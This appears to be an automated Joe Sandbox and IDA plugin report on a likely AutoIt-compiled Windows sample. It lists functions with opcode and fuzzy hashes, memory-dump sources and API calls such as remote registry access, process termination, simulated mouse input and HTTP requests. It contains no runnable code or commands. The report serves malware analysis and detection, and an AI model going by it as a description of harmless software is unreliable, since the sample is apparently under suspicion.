                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                    • String ID:
                                    • API String ID: 3567560977-0
                                    • Opcode ID: a964ca21974354fccbe87f35e8b3e63966ab7e6125012ee3c41359d039d0337b
                                    • Instruction ID: 475be646f5d72fb8d82451898073d630523e9edf6465d395b6e75abb7f2ac83f
                                    • Opcode Fuzzy Hash: a964ca21974354fccbe87f35e8b3e63966ab7e6125012ee3c41359d039d0337b
                                    • Instruction Fuzzy Hash: 8DF06D3251D7215AF734B67CBC0364A3690FB03730B214A2AF4E5C59D2EF60944245A2
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008A3F85), ref: 008A4085
                                    • GetProcAddress.KERNEL32(00000000), ref: 008A408C
                                    • RtlEncodePointer.NTDLL(00000000), ref: 008A4097
                                    • RtlDecodePointer.NTDLL(008A3F85), ref: 008A40B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                    • String ID: RoUninitialize$combase.dll
                                    • API String ID: 3489934621-2819208100
                                    • Opcode ID: 50566ac1e8fea92afe89b8911c71debe9c8f9b71daec846c3d6d79a1557cb8a0
                                    • Instruction ID: 6918b99f76c18453375650ee0036b34a655bbbe5249d1d03b8c2b99ec4f99453
                                    • Opcode Fuzzy Hash: 50566ac1e8fea92afe89b8911c71debe9c8f9b71daec846c3d6d79a1557cb8a0
                                    • Instruction Fuzzy Hash: C6E092786AD700EFEB60AF71ED1AB453AA4B74A786F109024F111E58A0CBB64644FB14
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6b189b47de8413556861a5eddaff62eefa4b25f099830299e6cb0665a61b72b0
                                    • Instruction ID: a5e12ef34d1a6bc84f5f9cc9122ae17e8b11d55c1b35052827240694d0121091
                                    • Opcode Fuzzy Hash: 6b189b47de8413556861a5eddaff62eefa4b25f099830299e6cb0665a61b72b0
                                    • Instruction Fuzzy Hash: DA619D71208205ABD710FB28DC82E7BB7A8FF84714F544A19F696DB292EB719D04C752
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memmove$__itow__swprintf
                                    • String ID:
                                    • API String ID: 3253778849-0
                                    • Opcode ID: 252363474222daa7ffc5f90582436cd049655afb3bfa590e9cf2d97247ad03e5
                                    • Instruction ID: ded6fef1deb4911a089b49dea4f2acdd985ad2e4e7e4174a87ba0acc2586f65b
                                    • Opcode Fuzzy Hash: 252363474222daa7ffc5f90582436cd049655afb3bfa590e9cf2d97247ad03e5
                                    • Instruction Fuzzy Hash: FA619D3050029A9BDF01FF69CC81AFE37A5FF16308F044529F8599B1A2EA35D815DB52
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 00900E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008FFDAD,?,?), ref: 00900E31
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009002BD
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009002FD
                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00900320
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00900349
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0090038C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00900399
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                    • String ID:
                                    • API String ID: 4046560759-0
                                    • Opcode ID: b61436a3b07055a0e0fc7fce59d03abcacf465d7113ddd971e496d357bea9a83
                                    • Instruction ID: 2ae3911ded128bec99c6bc4e8a63590596659c81ceb32a84642085fcb9cff64b
                                    • Opcode Fuzzy Hash: b61436a3b07055a0e0fc7fce59d03abcacf465d7113ddd971e496d357bea9a83
                                    • Instruction Fuzzy Hash: 4A515731208204AFCB15EF68D885E6EBBF9FF89314F04492DF595872A2DB31E905DB52
                                    APIs
                                    • GetMenu.USER32(?), ref: 009057FB
                                    • GetMenuItemCount.USER32(00000000), ref: 00905832
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0090585A
                                    • GetMenuItemID.USER32(?,?), ref: 009058C9
                                    • GetSubMenu.USER32(?,?), ref: 009058D7
                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00905928
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountMessagePostString
                                    • String ID:
                                    • API String ID: 650687236-0
                                    • Opcode ID: 5e2d90d40dc05cae6fb66d3313c874cd69cc9996502425a330f3356c8e4fd7d9
                                    • Instruction ID: 72ce652a765c2514af48dad0abc447a95e2541d2e08c5b2b504380fcc2bb18b0
                                    • Opcode Fuzzy Hash: 5e2d90d40dc05cae6fb66d3313c874cd69cc9996502425a330f3356c8e4fd7d9
                                    • Instruction Fuzzy Hash: 23515A35A00615EFCF11AF68C845AAEB7B4FF48320F158069EC56AB391CB34AE419F91
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 008DEF06
                                    • VariantClear.OLEAUT32(00000013), ref: 008DEF78
                                    • VariantClear.OLEAUT32(00000000), ref: 008DEFD3
                                    • _memmove.LIBCMT ref: 008DEFFD
                                    • VariantClear.OLEAUT32(?), ref: 008DF04A
                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008DF078
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                    • String ID:
                                    • API String ID: 1101466143-0
                                    • Opcode ID: 299746681ca80abfecefcb9f87ff61cb98c68d995f8a56db0b1d18360ab1aac6
                                    • Instruction ID: aa75fdfd4c1da1353955da21b055e46bc734742e781186b0f76eed7e096842b5
                                    • Opcode Fuzzy Hash: 299746681ca80abfecefcb9f87ff61cb98c68d995f8a56db0b1d18360ab1aac6
                                    • Instruction Fuzzy Hash: 3D515CB5A00209DFDB14DF58C884AAAB7B8FF4C314B15856AEE59DB301E735E911CBA0
                                    APIs
                                    • _memset.LIBCMT ref: 008E2258
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E22A3
                                    • IsMenu.USER32(00000000), ref: 008E22C3
                                    • CreatePopupMenu.USER32 ref: 008E22F7
                                    • GetMenuItemCount.USER32(000000FF), ref: 008E2355
                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 008E2386
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                    • String ID:
                                    • API String ID: 3311875123-0
                                    • Opcode ID: 190ea18e37b38799b7a1a78de091952d225a98776b543ce2c742fe90b2b6a46c
                                    • Instruction ID: 52844118774bccf09b70be315584af40d148cd4d225a239af52b4c1e269945db
                                    • Opcode Fuzzy Hash: 190ea18e37b38799b7a1a78de091952d225a98776b543ce2c742fe90b2b6a46c
                                    • Instruction Fuzzy Hash: E6518B70600289DFDF21CF6AC888BAEBBE9FF46318F144169E815D72A1D3749A44CF51
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0088179A
                                    • GetWindowRect.USER32(?,?), ref: 008817FE
                                    • ScreenToClient.USER32(?,?), ref: 0088181B
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0088182C
                                    • EndPaint.USER32(?,?), ref: 00881876
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                    • String ID:
                                    • API String ID: 1827037458-0
                                    • Opcode ID: a86e56e085b41ce08ae0431d7fd9329629d279a0392f6e615176fb6f8586425e
                                    • Instruction ID: 93078968fa0a063f5dd3d315fcffd42d4ade4be8fc81137e4638b01581214a73
                                    • Opcode Fuzzy Hash: a86e56e085b41ce08ae0431d7fd9329629d279a0392f6e615176fb6f8586425e
                                    • Instruction Fuzzy Hash: C841A3301047049FDB10EF64CC89FA67BECFB4A724F040639F564C62A2CB719946EB62
                                    APIs
                                    • ShowWindow.USER32(009457B0,00000000,01562660,?,?,009457B0,?,0090B5A8,?,?), ref: 0090B712
                                    • EnableWindow.USER32(00000000,00000000), ref: 0090B736
                                    • ShowWindow.USER32(009457B0,00000000,01562660,?,?,009457B0,?,0090B5A8,?,?), ref: 0090B796
                                    • ShowWindow.USER32(00000000,00000004,?,0090B5A8,?,?), ref: 0090B7A8
                                    • EnableWindow.USER32(00000000,00000001), ref: 0090B7CC
                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0090B7EF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: 90ab693c7abe81b2fd9a64eec182ed1a4fd0259cd70e1d50dc61269124c4c525
                                    • Instruction ID: 3d8ec3f4ca37a5a9e57d5b0ca547cca502df04f80b88506f10faed95295d0222
                                    • Opcode Fuzzy Hash: 90ab693c7abe81b2fd9a64eec182ed1a4fd0259cd70e1d50dc61269124c4c525
                                    • Instruction Fuzzy Hash: B4419D34604244AFDB22CF28C499B947BF4FF85710F1841B9E9489FAE3C732A956DB51
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,008F4E41,?,?,00000000,00000001), ref: 008F70AC
                                      • Part of subcall function 008F39A0: GetWindowRect.USER32(?,?), ref: 008F39B3
                                    • GetDesktopWindow.USER32 ref: 008F70D6
                                    • GetWindowRect.USER32(00000000), ref: 008F70DD
                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 008F710F
                                      • Part of subcall function 008E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E52BC
                                    • GetCursorPos.USER32(?), ref: 008F713B
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008F7199
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                    • String ID:
                                    • API String ID: 4137160315-0
                                    • Opcode ID: a73f3256cc721085d06bb31b79055e889797276b2ea0c802da9587f90bf6506f
                                    • Instruction ID: 491e78adb4c97929eddab1b0eeba121d186060641763e6f64bcdbeb71b23d59f
                                    • Opcode Fuzzy Hash: a73f3256cc721085d06bb31b79055e889797276b2ea0c802da9587f90bf6506f
                                    • Instruction Fuzzy Hash: A631B272509309AFD720DF24CC49BABB7EAFF89314F000919F585D7191DA71EA49CB92
                                    APIs
                                      • Part of subcall function 00889837: __itow.LIBCMT ref: 00889862
                                      • Part of subcall function 00889837: __swprintf.LIBCMT ref: 008898AC
                                      • Part of subcall function 0089FC86: _wcscpy.LIBCMT ref: 0089FCA9
                                    • _wcstok.LIBCMT ref: 008EEC94
                                    • _wcscpy.LIBCMT ref: 008EED23
                                    • _memset.LIBCMT ref: 008EED56
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                     • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                    • String ID: X
                                    • API String ID: 774024439-3081909835
                                    APIs
                                      • Part of subcall function 008D80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008D80C0
                                      • Part of subcall function 008D80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008D80CA
                                      • Part of subcall function 008D80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008D80D9
                                      • Part of subcall function 008D80A9: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008D80E0
                                      • Part of subcall function 008D80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008D80F6
                                    • GetLengthSid.ADVAPI32(?,00000000,008D842F), ref: 008D88CA
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008D88D6
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008D88DD
                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 008D88F6
                                    • GetProcessHeap.KERNEL32(00000000,00000000,008D842F), ref: 008D890A
                                    • HeapFree.KERNEL32(00000000), ref: 008D8911
                                    Similarity
                                    • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                    • String ID:
                                    • API String ID: 169236558-0
                                    APIs
                                    • GetDC.USER32(00000000), ref: 008DB7B5
                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 008DB7C6
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008DB7CD
                                    • ReleaseDC.USER32(00000000,00000000), ref: 008DB7D5
                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 008DB7EC
                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 008DB7FE
                                    Similarity
                                    • API ID: CapsDevice$Release
                                    • String ID:
                                    • API String ID: 1035833867-0
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A0193
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 008A019B
                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A01A6
                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A01B1
                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 008A01B9
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 008A01C1
                                    Similarity
                                    • API ID: Virtual
                                    • String ID:
                                    • API String ID: 4278518827-0
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E53F9
                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008E540F
                                    • GetWindowThreadProcessId.USER32(?,?), ref: 008E541E
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E542D
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E5437
                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E543E
                                    Similarity
                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                    • String ID:
                                    • API String ID: 839392675-0
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,?), ref: 008E7243
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 008E7254
                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00890EE4,?,?), ref: 008E7261
                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00890EE4,?,?), ref: 008E726E
                                      • Part of subcall function 008E6C35: CloseHandle.KERNEL32(00000000,?,008E727B,?,00890EE4,?,?), ref: 008E6C3F
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 008E7281
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 008E7288
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 008F8613
                                    • CharUpperBuffW.USER32(?,?), ref: 008F8722
                                    • VariantClear.OLEAUT32(?), ref: 008F889A
                                      • Part of subcall function 008E7562: VariantInit.OLEAUT32(00000000), ref: 008E75A2
                                      • Part of subcall function 008E7562: VariantCopy.OLEAUT32(00000000,?), ref: 008E75AB
                                      • Part of subcall function 008E7562: VariantClear.OLEAUT32(00000000), ref: 008E75B7
                                    Strings
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4237274167-1221869570
                                    APIs
                                      • Part of subcall function 0089FC86: _wcscpy.LIBCMT ref: 0089FCA9
                                    • _memset.LIBCMT ref: 008E2B87
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008E2BB6
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008E2C69
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008E2C97
                                    Strings
                                    Similarity
                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                    • String ID: 0
                                    • API String ID: 4152858687-4108050209
                                    APIs
                                    • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 008DD5D4
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008DD60A
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008DD61B
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008DD69D
                                    Strings
                                    Similarity
                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 753597075-1075368562
                                    APIs
                                    • _memset.LIBCMT ref: 008E27C0
                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008E27DC
                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 008E2822
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00945890,00000000), ref: 008E286B
                                    Strings
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem_memset
                                    • String ID: 0
                                    • API String ID: 1173514356-4108050209
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008FD7C5
                                      • Part of subcall function 0088784B: _memmove.LIBCMT ref: 00887899
                                    Strings
                                    Similarity
                                    • API ID: BuffCharLower_memmove
                                    • String ID: cdecl$none$stdcall$winapi
                                    • API String ID: 3425801089-567219261
                                    APIs
                                      • Part of subcall function 00887DE1: _memmove.LIBCMT ref: 00887E22
                                      • Part of subcall function 008DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 008DAABC
                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008D8F14
                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008D8F27
                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 008D8F57
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    Strings
                                    Similarity
                                    • API ID: MessageSend$_memmove$ClassName
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 365058703-1403004172
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008F184C
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008F1872
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008F18A2
                                    • InternetCloseHandle.WININET(00000000), ref: 008F18E9
                                      • Part of subcall function 008F2483: GetLastError.KERNEL32(?,?,008F1817,00000000,00000000,00000001), ref: 008F2498
                                      • Part of subcall function 008F2483: SetEvent.KERNEL32(?,?,008F1817,00000000,00000000,00000001), ref: 008F24AD
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 3113390036-3916222277
                                    APIs
